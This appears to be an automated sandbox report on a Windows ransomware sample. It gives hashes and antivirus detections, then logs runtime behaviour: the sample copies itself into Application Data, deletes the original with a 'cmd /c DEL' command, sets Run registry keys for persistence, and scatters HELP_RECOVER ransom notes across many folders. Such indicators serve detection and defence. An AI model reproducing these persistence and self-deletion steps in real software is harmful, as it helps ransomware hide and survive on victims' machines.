Analysis Date2016-02-12 21:31:17
MD5835c49402c922868ab7f39d8074d9a81
SHA1c4309ab1af87f4c7e3ce94813491892fcc79d39e

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section.coat md5: 94e2f96f7a025201723af30a54119207 sha1: b83c17595631780eaf366681f8daa3920d5df160 size: 4608
Section.cbbl md5: 24e13c61272b17ba94c55a5fe742ec7b sha1: 7039252da5c856fe0a3537605d65cd20151b76e3 size: 141824
Section.rdata md5: b83c9a1827a721cd28138eb26cf711d1 sha1: 34dea5a397948b518a683adee133669e3014c87c size: 58880
Section.data md5: 231ba7231b52ce74848e56b677041e23 sha1: 64591647569ecea096090a4a7bd5d5890b542e7e size: 37888
Section.rsrc md5: 80d69ece30522c2c00ebde7d20f9907f sha1: cdcd0e5366058dee3ac70fa43ce83b61d3b10a95 size: 187904
Timestamp2016-02-08 21:59:28
PackerMicrosoft Visual C++ ?.?
PEhashd06b61389b1b1842b60162ca55fb084a27fbeeb5
IMPhashbd2a8f9ba380f160b10d2209983a6ae7
AVCA (E-Trust Ino)Gen:Variant.Symmi.60982
AVRisingNo Virus
AVMcafeeBackDoor-FDCH!835C49402C92
AVAvira (antivir)TR/Crypt.Xpack.445768
AVTwisterTrojan.Cap1621223.qdwg
AVAd-AwareGen:Variant.Symmi.60982
AVAlwil (avast)Win32:Trojan-gen
AVEset (nod32)Win32/Kryptik.ENJD
AVGrisoft (avg)Generic37.ALQI
AVSymantecTrojan.Cryptlock.N!g2
AVFortinetW32/Generic.AC.3397816
AVBitDefenderGen:Variant.Symmi.60982
AVK7Trojan ( 004ddcd41 )
AVMicrosoft Security EssentialsRansom:Win32/Tescrypt!rfn
AVMicroWorld (escan)Gen:Variant.Zusy.181890
AVMalwareBytesTrojan.MalPack.PK
AVAuthentiumW32/Agent.XL.gen!Eldorado
AVEmsisoftGen:Variant.Symmi.60982
AVFrisk (f-prot)W32/Agent.XL.gen!Eldorado
AVIkarusNo Virus
AVZillya!Trojan.Kryptik.Win32.861347
AVKasperskyTrojan-Ransom.Win32.Blocker.ibeq
AVTrend MicroNo Virus
AVVirusBlokAda (vba32)No Virus
AVCAT (quickheal)Ransom.Crowti.WR7
AVBullGuardGen:Variant.Zusy.181890
AVArcabit (arcavir)Gen:Variant.Symmi.60982
AVClamAVNo Virus
AVDr. WebTrojan.Inject1.56622
AVF-SecureGen:Variant.Zusy.181890

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

Creates FileC:\Documents and Settings\Administrator\Application Data\gukyrts.exe
Creates ProcessC:\Documents and Settings\Administrator\Application Data\gukyrts.exe
Creates ProcessC:\WINDOWS\system32\cmd.exe /c DEL C:\C4309A~1.EXE

Process
↳ C:\WINDOWS\system32\cmd.exe /c DEL C:\C4309A~1.EXE

Process
↳ C:\Documents and Settings\Administrator\Application Data\gukyrts.exe

RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\dsfgsdf-67897869 ➝
C:\Documents and Settings\Administrator\Application Data\gukyrts.exe\\x00
RegistryHKEY_CURRENT_USER\Software\4038526C822C32B2\data ➝
NULL
RegistryHKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections ➝
1
RegistryHKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\dsfgsdf-67897869 ➝
C:\Documents and Settings\Administrator\Application Data\gukyrts.exe\\x00
RegistryHKEY_CURRENT_USER\Software\xxxsys\ID ➝
NULL
Creates FileC:\Documents and Settings\All Users\Start Menu\Programs\Accessories\System Tools\HELP_RECOVER_instructions+jha.txt
Creates FileC:\Documents and Settings\All Users\Documents\My Pictures\Sample Pictures\HELP_RECOVER_instructions+jha.png
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Updater6\HELP_RECOVER_instructions+jha.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\9.0\Security\HELP_RECOVER_instructions+jha.html
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\9.0\JavaScripts\glob.js
Creates FileC:\Documents and Settings\Administrator\Start Menu\HELP_RECOVER_instructions+jha.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\WERfd9e.dir00\HELP_RECOVER_instructions+jha.html
Creates FileC:\Documents and Settings\All Users\Documents\My Pictures\HELP_RECOVER_instructions+jha.html
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Microsoft\Credentials\HELP_RECOVER_instructions+jha.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\IMJP8_1\HELP_RECOVER_instructions+jha.html
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\WERfd9e.dir00\HELP_RECOVER_instructions+jha.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\Windows\Themes\HELP_RECOVER_instructions+jha.html
Creates FileC:\Documents and Settings\Administrator\PrintHood\HELP_RECOVER_instructions+jha.html
Creates FileC:\Documents and Settings\Administrator\Start Menu\Programs\HELP_RECOVER_instructions+jha.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Identities\HELP_RECOVER_instructions+jha.txt
Creates FileC:\Documents and Settings\Administrator\Start Menu\Programs\Accessories\HELP_RECOVER_instructions+jha.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\SystemCertificates\My\HELP_RECOVER_instructions+jha.txt
Creates FileC:\Documents and Settings\All Users\Documents\My Music\Sample Playlists\HELP_RECOVER_instructions+jha.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\7.0\JavaScripts\HELP_RECOVER_instructions+jha.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\Media Player\HELP_RECOVER_instructions+jha.html
Creates FileC:\Documents and Settings\Administrator\PrintHood\HELP_RECOVER_instructions+jha.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Linguistics\Dictionaries\HELP_RECOVER_instructions+jha.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Microsoft\HELP_RECOVER_instructions+jha.html
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\HELP_RECOVER_instructions+jha.png
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Color\HELP_RECOVER_instructions+jha.png
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\Microsoft Visual C++ 2010 x86 Redistributable Setup_10.0.30319\HELP_RECOVER_instructions+jha.png
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\dd_netfx20UI3716.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\7.0\Collab\HELP_RECOVER_instructions+jha.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\7.0\Preferences\HELP_RECOVER_instructions+jha.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\9.0\JavaScripts\HELP_RECOVER_instructions+jha.txt
Creates FileC:\Documents and Settings\All Users\Start Menu\Programs\Accessories\Accessibility\HELP_RECOVER_instructions+jha.html
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\CryptnetUrlCache\Content\HELP_RECOVER_instructions+jha.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\658HSJSD\HELP_RECOVER_instructions+jha.png
Creates FileC:\Documents and Settings\Administrator\NetHood\HELP_RECOVER_instructions+jha.png
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Acrobat\9.0\HELP_RECOVER_instructions+jha.png
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\HELP_RECOVER_instructions+jha.png
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\TypeSupport\HELP_RECOVER_instructions+jha.html
Creates FileC:\Documents and Settings\All Users\Start Menu\Programs\Accessories\System Tools\HELP_RECOVER_instructions+jha.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Linguistics\Dictionaries\Adobe Custom Dictionary\HELP_RECOVER_instructions+jha.html
Creates FileC:\Documents and Settings\All Users\Start Menu\Programs\Accessories\Accessibility\HELP_RECOVER_instructions+jha.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\AdobeUM\HELP_RECOVER_instructions+jha.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\Internet Explorer\Quick Launch\HELP_RECOVER_instructions+jha.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\HELP_RECOVER_instructions+jha.html
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Microsoft\Windows\HELP_RECOVER_instructions+jha.html
Creates FileC:\Documents and Settings\Administrator\Templates\HELP_RECOVER_instructions+jha.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Microsoft\Credentials\HELP_RECOVER_instructions+jha.html
Creates FilePIPE\wkssvc
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\7.0\Updater\udstore.js
Creates FileC:\Documents and Settings\Administrator\PrintHood\HELP_RECOVER_instructions+jha.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\SystemCertificates\My\CTLs\HELP_RECOVER_instructions+jha.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Identities\HELP_RECOVER_instructions+jha.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Linguistics\Dictionaries\Adobe Custom Dictionary\all\HELP_RECOVER_instructions+jha.png
Creates FileC:\Documents and Settings\Administrator\Start Menu\Programs\Accessories\Entertainment\HELP_RECOVER_instructions+jha.png
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Updater6\HELP_RECOVER_instructions+jha.png
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Acrobat\9.0\Cache\HELP_RECOVER_instructions+jha.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\Internet Explorer\HELP_RECOVER_instructions+jha.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\9.0\Forms\HELP_RECOVER_instructions+jha.txt
Creates FileC:\Documents and Settings\All Users\Documents\My Music\Sample Music\New Stories (Highway Blues).wma
Creates FileC:\Documents and Settings\Administrator\NetHood\HELP_RECOVER_instructions+jha.txt
Creates FileC:\Documents and Settings\Administrator\HELP_RECOVER_instructions+jha.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Linguistics\Dictionaries\Adobe Custom Dictionary\HELP_RECOVER_instructions+jha.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Acrobat\7.0\Cache\HELP_RECOVER_instructions+jha.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\HELP_RECOVER_instructions+jha.html
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\MMC\HELP_RECOVER_instructions+jha.png
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Microsoft\Credentials\S-1-5-21-XXXXXXXXXX-XXXXXXXXXX-XXXXXXXXXX-500\HELP_RECOVER_instructions+jha.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Acrobat\7.0\HELP_RECOVER_instructions+jha.txt
Creates FileC:\Documents and Settings\All Users\Documents\HELP_RECOVER_instructions+jha.html
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\MMC\HELP_RECOVER_instructions+jha.txt
Creates FileC:\Documents and Settings\All Users\DRM\HELP_RECOVER_instructions+jha.html
Creates FileC:\Documents and Settings\All Users\Documents\My Music\Sample Playlists\0019E545\HELP_RECOVER_instructions+jha.html
Creates FileC:\Documents and Settings\Administrator\Recent\HELP_RECOVER_instructions+jha.html
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\7.0\Updater\HELP_RECOVER_instructions+jha.html
Creates FileC:\Documents and Settings\All Users\Documents\My Pictures\Sample Pictures\Winter.jpg
Creates FileC:\Documents and Settings\Administrator\Local Settings\HELP_RECOVER_instructions+jha.png
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Updater6\Install\HELP_RECOVER_instructions+jha.png
Creates FileC:\Documents and Settings\Administrator\My Documents\My Pictures\HELP_RECOVER_instructions+jha.html
Creates FileC:\Documents and Settings\Administrator\Favorites\HELP_RECOVER_instructions+jha.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\CryptnetUrlCache\HELP_RECOVER_instructions+jha.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\9.0\Forms\HELP_RECOVER_instructions+jha.png
Creates FileC:\Documents and Settings\All Users\Documents\My Music\HELP_RECOVER_instructions+jha.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\Credentials\HELP_RECOVER_instructions+jha.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\HELP_RECOVER_instructions+jha.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\History.IE5\HELP_RECOVER_instructions+jha.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Linguistics\Dictionaries\Adobe Custom Dictionary\can\HELP_RECOVER_instructions+jha.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Updater6\Install\HELP_RECOVER_instructions+jha.html
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\7.0\JavaScripts\HELP_RECOVER_instructions+jha.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\SystemCertificates\My\Certificates\HELP_RECOVER_instructions+jha.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\CryptnetUrlCache\Content\HELP_RECOVER_instructions+jha.html
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\IIQ3LGTM\HELP_RECOVER_instructions+jha.png
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\BSDHA97U\HELP_RECOVER_instructions+jha.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\CryptnetUrlCache\MetaData\HELP_RECOVER_instructions+jha.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Acrobat\7.0\Cache\Search70\HELP_RECOVER_instructions+jha.png
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Acrobat\HELP_RECOVER_instructions+jha.txt
Creates FileC:\Documents and Settings\All Users\Documents\My Music\My Playlists\HELP_RECOVER_instructions+jha.txt
Creates FileC:\Documents and Settings\Administrator\Favorites\Links\HELP_RECOVER_instructions+jha.txt
Creates FileC:\Documents and Settings\All Users\Documents\My Pictures\Sample Pictures\Water lilies.jpg
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Reader 9.3\HELP_RECOVER_instructions+jha.html
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\Internet Explorer\HELP_RECOVER_instructions+jha.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Microsoft\Windows Media\9.0\HELP_RECOVER_instructions+jha.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\HELP_RECOVER_instructions+jha.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\Credentials\HELP_RECOVER_instructions+jha.html
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\SystemCertificates\My\CRLs\HELP_RECOVER_instructions+jha.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Reader 9.3\HELP_RECOVER_instructions+jha.png
Creates FileC:\Documents and Settings\All Users\Documents\My Music\Sample Playlists\0019E545\HELP_RECOVER_instructions+jha.png
Creates FileC:\Documents and Settings\Administrator\Start Menu\Programs\HELP_RECOVER_instructions+jha.png
Creates FileC:\Documents and Settings\Administrator\Templates\HELP_RECOVER_instructions+jha.png
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\TypeSupport\HELP_RECOVER_instructions+jha.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\History.IE5\MSHist012013061320130614\HELP_RECOVER_instructions+jha.html
Creates FileC:\Documents and Settings\All Users\Start Menu\Programs\Accessories\Communications\HELP_RECOVER_instructions+jha.html
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\SystemCertificates\HELP_RECOVER_instructions+jha.html
Creates FileC:\Documents and Settings\All Users\Documents\My Videos\HELP_RECOVER_instructions+jha.png
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\BSDHA97U\HELP_RECOVER_instructions+jha.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Microsoft\Internet Explorer\HELP_RECOVER_instructions+jha.png
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\HELP_RECOVER_instructions+jha.html
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\HELP_RECOVER_instructions+jha.txt
Creates FileC:\Documents and Settings\Administrator\Templates\winword.doc
Creates FileC:\Documents and Settings\Administrator\Start Menu\Programs\Accessories\HELP_RECOVER_instructions+jha.html
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Acrobat\9.0\Cache\HELP_RECOVER_instructions+jha.png
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\HELP_RECOVER_instructions+jha.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\SystemCertificates\My\CRLs\HELP_RECOVER_instructions+jha.png
Creates FileC:\Documents and Settings\All Users\Documents\My Music\My Playlists\HELP_RECOVER_instructions+jha.png
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\658HSJSD\HELP_RECOVER_instructions+jha.html
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Linguistics\Dictionaries\Adobe Custom Dictionary\eng\HELP_RECOVER_instructions+jha.html
Creates FileC:\Documents and Settings\All Users\Documents\My Music\My Playlists\HELP_RECOVER_instructions+jha.html
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Microsoft\Credentials\S-1-5-21-XXXXXXXXXX-XXXXXXXXXX-XXXXXXXXXX-500\HELP_RECOVER_instructions+jha.html
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Reader 9.3\HELP_RECOVER_instructions+jha.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\IIQ3LGTM\HELP_RECOVER_instructions+jha.html
Creates FileC:\Documents and Settings\All Users\Start Menu\Programs\Accessories\HELP_RECOVER_instructions+jha.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\9.0\JavaScripts\HELP_RECOVER_instructions+jha.png
Creates FileC:\Documents and Settings\Administrator\Recent\HELP_RECOVER_instructions+jha.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\7.0\JavaScripts\HELP_RECOVER_instructions+jha.html
Creates FileC:\Documents and Settings\All Users\Documents\My Videos\HELP_RECOVER_instructions+jha.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\History.IE5\HELP_RECOVER_instructions+jha.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\7.0\Preferences\HELP_RECOVER_instructions+jha.png
Creates FileC:\Documents and Settings\All Users\Start Menu\Programs\Games\HELP_RECOVER_instructions+jha.png
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Microsoft\Windows Media\9.0\HELP_RECOVER_instructions+jha.png
Creates FileC:\Documents and Settings\Administrator\Start Menu\Programs\Accessories\Accessibility\HELP_RECOVER_instructions+jha.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\Microsoft Visual C++ 2010 x86 Redistributable Setup_10.0.30319\HELP_RECOVER_instructions+jha.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\D4Z32ED8\HELP_RECOVER_instructions+jha.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Linguistics\HELP_RECOVER_instructions+jha.png
Creates FileC:\Documents and Settings\Administrator\My Documents\recover_file_pjkeqiwvr.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Linguistics\Dictionaries\Adobe Custom Dictionary\eng\HELP_RECOVER_instructions+jha.png
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Acrobat\7.0\Cache\Search70\HELP_RECOVER_instructions+jha.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\7.0\Updater\HELP_RECOVER_instructions+jha.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Reader 9.3\Setup Files\HELP_RECOVER_instructions+jha.html
Creates FileC:\Documents and Settings\All Users\Documents\My Pictures\Sample Pictures\HELP_RECOVER_instructions+jha.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Acrobat\7.0\Cache\HELP_RECOVER_instructions+jha.png
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Acrobat\7.0\HELP_RECOVER_instructions+jha.html
Creates FileC:\Documents and Settings\All Users\Start Menu\Programs\HELP_RECOVER_instructions+jha.html
Creates FileC:\Documents and Settings\Administrator\NetHood\shared on Samba 3.6.9-151.el6 (192.168.1.1)\HELP_RECOVER_instructions+jha.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Microsoft\Credentials\HELP_RECOVER_instructions+jha.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\CryptnetUrlCache\HELP_RECOVER_instructions+jha.html
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Reader 9.3\Setup Files\HELP_RECOVER_instructions+jha.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Identities\{66520883-AF04-4437-A539-3E2F2944B956}\HELP_RECOVER_instructions+jha.png
Creates FileC:\Documents and Settings\All Users\Start Menu\Programs\Accessories\Entertainment\HELP_RECOVER_instructions+jha.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Linguistics\Dictionaries\Adobe Custom Dictionary\brt\HELP_RECOVER_instructions+jha.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\Internet Explorer\brndlog.txt
Creates FileC:\Documents and Settings\All Users\Documents\My Pictures\Sample Pictures\Blue hills.jpg
Creates FileC:\Documents and Settings\Administrator\SendTo\HELP_RECOVER_instructions+jha.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Reader 9.3\Setup Files\Reader9\HELP_RECOVER_instructions+jha.html
Creates FileC:\Documents and Settings\All Users\Favorites\HELP_RECOVER_instructions+jha.png
Creates FileC:\Documents and Settings\Administrator\Start Menu\HELP_RECOVER_instructions+jha.png
Creates FileC:\Documents and Settings\Administrator\Application Data\HELP_RECOVER_instructions+jha.html
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\Internet Explorer\Quick Launch\HELP_RECOVER_instructions+jha.png
Creates FileC:\Documents and Settings\All Users\Start Menu\Programs\Accessories\HELP_RECOVER_instructions+jha.png
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Acrobat\HELP_RECOVER_instructions+jha.png
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Acrobat\9.0\HELP_RECOVER_instructions+jha.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Microsoft\Windows\HELP_RECOVER_instructions+jha.png
Creates FileC:\Documents and Settings\Administrator\Start Menu\Programs\Accessories\Entertainment\HELP_RECOVER_instructions+jha.txt
Creates FileC:\Documents and Settings\Administrator\Start Menu\Programs\Startup\HELP_RECOVER_instructions+jha.html
Creates FileC:\Documents and Settings\All Users\Start Menu\Programs\Games\HELP_RECOVER_instructions+jha.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\SystemCertificates\My\HELP_RECOVER_instructions+jha.html
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\Media Player\HELP_RECOVER_instructions+jha.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\HELP_RECOVER_instructions+jha.html
Creates FileC:\Documents and Settings\Administrator\My Documents\My Music\HELP_RECOVER_instructions+jha.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Updater6\Install\HELP_RECOVER_instructions+jha.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\History.IE5\MSHist012013061320130614\HELP_RECOVER_instructions+jha.png
Creates FileC:\Documents and Settings\Administrator\My Documents\HELP_RECOVER_instructions+jha.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\HELP_RECOVER_instructions+jha.png
Creates FileC:\Documents and Settings\All Users\Start Menu\Programs\Accessories\Entertainment\HELP_RECOVER_instructions+jha.html
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\HELP_RECOVER_instructions+jha.png
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\WERfd9e.dir00\manifest.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\HELP_RECOVER_instructions+jha.txt
Creates FileC:\Documents and Settings\Administrator\Start Menu\Programs\Startup\HELP_RECOVER_instructions+jha.png
Creates FileC:\Documents and Settings\Administrator\Favorites\HELP_RECOVER_instructions+jha.html
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Microsoft\Internet Explorer\HELP_RECOVER_instructions+jha.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\7.0\Updater\udlog.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Linguistics\Dictionaries\HELP_RECOVER_instructions+jha.html
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\HELP_RECOVER_instructions+jha.html
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\9.0\Security\HELP_RECOVER_instructions+jha.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\9.0\JavaScripts\glob.settings.js
Creates FileC:\Documents and Settings\All Users\Documents\My Music\HELP_RECOVER_instructions+jha.html
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\Microsoft Visual C++ 2010 x86 Redistributable Setup_10.0.30319\HELP_RECOVER_instructions+jha.html
Creates FileC:\Documents and Settings\Administrator\My Documents\My Music\HELP_RECOVER_instructions+jha.html
Creates FileC:\Documents and Settings\Administrator\Templates\winword2.doc
Creates FileC:\Documents and Settings\Administrator\NetHood\shared on Samba 3.6.9-151.el6 (192.168.1.1)\HELP_RECOVER_instructions+jha.html
Creates FileC:\Documents and Settings\All Users\Favorites\HELP_RECOVER_instructions+jha.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Color\HELP_RECOVER_instructions+jha.html
Creates FileC:\Documents and Settings\All Users\Documents\My Music\Sample Playlists\HELP_RECOVER_instructions+jha.html
Creates FileC:\Documents and Settings\Administrator\Cookies\HELP_RECOVER_instructions+jha.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\HELP_RECOVER_instructions+jha.html
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Reader 9.3\Setup Files\Reader9\HELP_RECOVER_instructions+jha.txt
Creates FileC:\Documents and Settings\Administrator\SendTo\HELP_RECOVER_instructions+jha.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\7.0\JavaScripts\glob.settings.js
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\7.0\HELP_RECOVER_instructions+jha.html
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\SystemCertificates\My\CRLs\HELP_RECOVER_instructions+jha.html
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Microsoft\Media Player\HELP_RECOVER_instructions+jha.txt
Creates FileC:\Documents and Settings\All Users\Start Menu\Programs\Administrative Tools\HELP_RECOVER_instructions+jha.html
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\MMC\HELP_RECOVER_instructions+jha.html
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Acrobat\9.0\Cache\HELP_RECOVER_instructions+jha.html
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\D4Z32ED8\HELP_RECOVER_instructions+jha.html
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Reader 9.3\Setup Files\HELP_RECOVER_instructions+jha.png
Creates FileC:\Documents and Settings\Administrator\HELP_RECOVER_instructions+jha.txt
Creates FileC:\Documents and Settings\Administrator\Templates\HELP_RECOVER_instructions+jha.html
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\History.IE5\HELP_RECOVER_instructions+jha.html
Creates FileC:\Documents and Settings\All Users\Documents\HELP_RECOVER_instructions+jha.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Acrobat\7.0\Cache\HELP_RECOVER_instructions+jha.html
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\7.0\Security\HELP_RECOVER_instructions+jha.png
Creates FileC:\Documents and Settings\Administrator\Cookies\HELP_RECOVER_instructions+jha.html
Creates FileC:\Documents and Settings\Administrator\Start Menu\Programs\Accessories\Accessibility\HELP_RECOVER_instructions+jha.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Linguistics\Dictionaries\Adobe Custom Dictionary\all\HELP_RECOVER_instructions+jha.txt
Creates FileC:\Documents and Settings\All Users\Start Menu\Programs\Accessories\Accessibility\HELP_RECOVER_instructions+jha.png
Creates FileC:\Documents and Settings\Administrator\Favorites\Links\HELP_RECOVER_instructions+jha.html
